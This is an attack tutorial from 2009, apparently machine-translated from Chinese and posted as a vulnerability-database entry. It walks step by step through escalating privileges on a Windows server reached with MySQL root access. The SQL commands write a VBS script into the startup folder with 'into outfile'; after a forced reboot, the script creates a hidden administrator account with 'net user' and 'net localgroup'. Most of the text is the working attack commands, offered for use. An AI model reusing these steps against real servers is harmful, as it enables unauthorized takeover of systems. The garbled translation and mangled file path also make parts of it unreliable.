phpshell written to the startup items to mention right-vulnerability warning-the black bar safety net

2009-12-13T00:00:00
ID MYHACK58:62200925588
Type myhack58
Reporter 佚名
Modified 2009-12-13T00:00:00

Description

The actual operation can be in webshell with the udf. dll mention to the right,with the function to upload file function to upload the file to the startup directory,then shut the function re-starting the system. (Currently not successful,the opportunity of the local test,the first record on this). If it is the English version of the system,start the directory in "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup"

1, is connected to the other MYSQL server mysql-u root-h 192.168.0.1 mysql.exe this program in your installation of MYSQL's BIN directory

2, Let us look at the server what database mysql>show databases; MYSQL is installed by default with MYSQL, the TEST of the two databases, if you see any other database so that the user self-built database.

3, Let us into the database mysql>use test; We will enter the test database

4, a view we enter in the database what is Data Table mysql>show tables; By default, the test does not have any table there. The following is the key part of the

5, in the TEST database create a new table; mysql>create table a (cmd text); Well, we created a new table, the table name is a table stored in only one field, the field named cmd As a text text.

6, in the table, insert the content mysql>insert into a values ("set wshshell=createobject (""wscript. shell"" ) " ); mysql>insert into a values ("a=wshshell. run (""cmd.exe /c net user 1 1/add"",0) " ); mysql>insert into a values ("b=wshshell. run (""cmd.exe /c net localgroup Administrators 1 /add"",0) " ); Note the double quotes and parentheses as well as the back of the“0”be sure to enter! We will use these three commands to create a VBS script program!

7, good, now we look at the table a some what mysql>select * from a; We will see in the table there are three rows of data, that is, we just input the content, confirm that you input the content is correct, we come to the next step

8, The output table is a VBS script file mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\"Start"Menu\\Programs\\start\of\ \ a. vbs"; we put our table of contents is input to the startup Group, is a VBS script files! Note the“\"symbol.

9, The see that everybody is sure to know, is the use of MYSQL output an executable file. Why not BAT? because to start the runtime there will be an obvious DOS window comes out, but with a VBS script you can completely hide the window and do not have the wrong tips! Originally, there should be a sentence completion scripts are automatically deleted after this script, but Chinese directory it can not handle, only to give up now! Well, find a tool attack 1 3 5 allow the server to restart it, a few minutes later you are the administrator.